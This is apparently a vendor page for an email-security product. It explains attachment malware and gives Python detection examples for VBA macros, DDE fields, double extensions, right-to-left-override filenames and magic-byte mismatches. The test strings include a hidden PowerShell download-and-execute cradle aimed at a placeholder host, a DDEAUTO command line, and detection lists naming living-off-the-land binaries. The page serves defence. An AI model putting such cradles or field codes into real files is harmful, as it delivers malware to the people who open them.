Threat Type

Attachment Malware: Beyond File-Type Blocklists

Malicious attachments have outgrown detection by file type or signature alone. Office documents with embedded macros, PDFs carrying exploits or JavaScript, and executables disguised as documents all require behavioral sandbox analysis, not just file-type identification, to be caught before delivery.

How malicious attachment attacks work

Common attack patterns

Office macro attacks: A Word document or Excel spreadsheet arrives as an "invoice" or "purchase order", both common enough that employees open them without suspicion. The document prompts the user to enable macros to view the content. The macro executes a PowerShell command, downloads a payload, and establishes persistence. Current Microsoft 365 apps block VBA macros by default in files that carry the Mark of the Web (anything downloaded from the internet or saved from email), but social engineering ("enable content to see the document"), container formats that strip the mark, and older or relaxed policy configurations mean this vector remains active.

PDF exploits: A malicious PDF exploits a vulnerability in the PDF reader, or embeds JavaScript or launch/URI actions that fetch a second-stage payload from a remote host when the file is opened. The file type itself is trusted and passes extension blocklists.

Disguised executables: An executable disguised with a double extension (invoice.pdf.exe) or with a file icon matching the claimed type. Because Windows hides known extensions by default, invoice.pdf.exe is shown as invoice.pdf. Some rely on the Unicode right-to-left override character (U+202E) to display a filename that appears to end in .pdf while the actual extension is .exe.

How Phishaver analyzes attachments

Sandbox detonation

Attachments are opened in an isolated environment. Observable behaviors, such as process spawning, network connections, registry modifications, and file system writes, are recorded and scored for malicious patterns. Samples that sleep, probe for virtualization artifacts, or wait for user interaction can sit out a short detonation, so sandbox verdicts are combined with the static checks below rather than used on their own.

Macro analysis

Office documents are scanned for embedded macros, VBA code, external data connections, and DDE fields. Macros that auto-execute on open and attempt to spawn processes or make network connections are flagged as high-risk.
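As an added illustration of the macro and DDE checks described above (example code written for this page, not Phishaver's own analysis engine), the following Python scores already-extracted VBA source and Word field codes with the same rule the text gives: an auto-exec entry point alone is medium risk, while any process-spawning or network primitive makes it high. Extracting VBA from a real .docm or .xls is left to a tool such as olevba from oletools; the VBA and field-code strings here are constructed samples, not real malware, and the pattern lists and weights are this example's own assumptions.

```python
import re

# Constructed VBA source (not a real sample), in the form olevba would extract it:
# an auto-exec entry point that spawns a hidden PowerShell download cradle.
MALICIOUS_VBA = r'''
Sub AutoOpen()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -nop -w hidden -c ""IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')""", 0
End Sub
'''

# Constructed benign macro: formats cells and touches no process or network API.
BENIGN_VBA = r'''
Sub FormatTotals()
    Range("A1:A10").NumberFormat = "0.00"
End Sub
'''

# Constructed Word field code: a DDEAUTO field executes a command when fields update.
DDE_FIELD = r'DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c calc"'

# Indicator categories, each with a regex and a weight (weights are an assumption
# for this example, not a published scoring scheme).
PATTERNS = {
    # Entry points that run as soon as content is enabled, with no further click.
    "autoexec": (re.compile(
        r"\b(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b",
        re.I), 2),
    # Process-spawning primitives.
    "process": (re.compile(
        r"\b(Shell|WScript\.Shell|ShellExecute|CreateProcess|CreateObject|winmgmts|Win32_Process)\b",
        re.I), 3),
    # Download and network primitives plus the usual living-off-the-land binaries.
    "network": (re.compile(
        r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|WebClient|DownloadString|DownloadFile"
        r"|powershell|bitsadmin|certutil|mshta)\b",
        re.I), 3),
}

# DDE and DDEAUTO field codes launch an external program without any macro.
DDE_PATTERN = re.compile(r"\bDDE(AUTO)?\b", re.I)


def score_macro(vba: str) -> dict:
    """Return per-category hits, a weighted score and a risk label for VBA source."""
    hits = {}
    score = 0
    for name, (pattern, weight) in PATTERNS.items():
        found = sorted({m.group(0) for m in pattern.finditer(vba)}, key=str.lower)
        if found:
            hits[name] = found
            score += weight
    # The page's rule: spawning processes or touching the network is high-risk.
    if "process" in hits or "network" in hits:
        risk = "high"
    elif hits:
        risk = "medium"
    else:
        risk = "low"
    return {"score": score, "risk": risk, "hits": hits}


def has_dde_field(field_code: str) -> bool:
    """True when a Word field code is a DDE/DDEAUTO field."""
    return bool(DDE_PATTERN.search(field_code))


if __name__ == "__main__":
    print(score_macro(MALICIOUS_VBA))
    print(score_macro(BENIGN_VBA))
    print(has_dde_field(DDE_FIELD))
```

Keyword scoring of this kind is deliberately cheap and runs before detonation; it is easy to defeat with string concatenation or Chr() obfuscation, which is why the behavioral sandbox step still follows it.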

True file type detection

Magic byte analysis determines the actual file type from the leading bytes of the content, independent of the declared extension. A file claiming to be a PDF but starting with an MZ (PE executable) header is flagged before any sandbox step.

Signature + behavioral combined

Known-bad signatures are checked first for speed. If no signature match, behavioral analysis runs. Both results contribute to the overall confidence score, with behavioral analysis weighted higher for novel samples.

Observable attachment threat indicators

  • Attachment true file type differs from declared extension
  • Office document contains macros (VBA) whose code spawns processes or opens network connections
  • Sandbox detonation observes outbound connection to an unrecognized external host
  • Sandbox observes registry write attempts consistent with persistence mechanisms
  • PDF contains JavaScript (for example, eval() over obfuscated strings) or launch/URI actions that fetch a remote payload
  • Filename contains Unicode right-to-left override characters
  • Double extension pattern detected (.pdf.exe, .docx.bat)
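The filename and file-type indicators in the list above, and the disguised-executable tricks and magic-byte check described earlier, can be evaluated without a sandbox. The Python below is an added example for this page, not Phishaver's code: it takes an attachment's filename and its first bytes and returns which of those indicators fire. The magic-byte table, the extension lists and the sample files are this example's own constructed inputs; a production scanner would use a full libmagic-style database.

```python
import re

# Magic-byte prefixes for the container types a mail gateway sees most often
# (constructed, abbreviated table for this example).
MAGIC = [
    (b"%PDF", "pdf"),
    (b"MZ", "exe"),                                  # DOS/PE executable
    (b"\x7fELF", "elf"),
    (b"PK\x03\x04", "zip"),                          # also OOXML: docx/xlsx/pptx
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),   # legacy doc/xls/ppt and MSI
    (b"Rar!\x1a\x07", "rar"),
    (b"\x1f\x8b", "gzip"),
]

# True type each declared extension is expected to carry.
EXPECTED = {
    "pdf": "pdf", "exe": "exe", "scr": "exe", "dll": "exe",
    "docx": "zip", "xlsx": "zip", "pptx": "zip", "docm": "zip", "xlsm": "zip", "zip": "zip",
    "doc": "ole", "xls": "ole", "ppt": "ole", "msi": "ole",
    "rar": "rar", "gz": "gzip",
}

# Unicode bidi controls: LRE/RLE/PDF/LRO/RLO (U+202A-202E) and the isolates (U+2066-2069).
BIDI_CONTROLS = re.compile("[\u202a-\u202e\u2066-\u2069]")

DECOY_EXTS = r"pdf|docx?|xlsx?|pptx?|txt|jpe?g|png|gif|zip|csv"
EXEC_EXTS = r"exe|scr|com|pif|bat|cmd|js|jse|vbs|vbe|wsf|ps1|hta|msi|lnk"
DOUBLE_EXT = re.compile(rf"\.({DECOY_EXTS})\.({EXEC_EXTS})$", re.I)


def true_type(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring the filename entirely."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def declared_extension(filename: str) -> str:
    """Extension the OS will actually use: bidi controls are invisible to it."""
    clean = BIDI_CONTROLS.sub("", filename)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_name(filename: str) -> str:
    """Approximate what a user sees: text after U+202E is rendered reversed.
    (Simplified model of the bidi algorithm; enough to show the trick.)"""
    head, sep, tail = filename.partition("\u202e")
    return head + tail[::-1] if sep else filename


def attachment_indicators(filename: str, data: bytes) -> list:
    """Return the static indicators from the page's list that this attachment triggers."""
    flags = []
    if BIDI_CONTROLS.search(filename):
        flags.append("rtlo_filename")
    if DOUBLE_EXT.search(BIDI_CONTROLS.sub("", filename)):
        flags.append("double_extension")
    expected = EXPECTED.get(declared_extension(filename))
    actual = true_type(data)
    if expected is not None and actual != "unknown" and actual != expected:
        flags.append("type_mismatch")
    return flags


# Constructed sample contents: a DOS/PE header stub and a PDF header, nothing more.
FAKE_PE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
FAKE_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"

if __name__ == "__main__":
    for name, data in [
        ("invoice.pdf.exe", FAKE_PE),          # double extension
        ("invoice\u202efdp.exe", FAKE_PE),     # shown to the user as invoiceexe.pdf
        ("statement.pdf", FAKE_PE),            # declared PDF, actually an executable
        ("quote.pdf", FAKE_PDF),               # clean
    ]:
        print(repr(displayed_name(name)), attachment_indicators(name, data))
```

Note what this does not catch: a plain setup.exe with an MZ header triggers none of these indicators, because name and content agree. Whether bare executables are allowed at all is a policy decision for the extension blocklist, not a disguise check; these indicators exist to catch files that lie about what they are.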

Block malicious attachments

Sandbox every attachment before it reaches the inbox.

Behavioral analysis catches what signature matching misses. Connect to M365 or Google Workspace in under 5 minutes.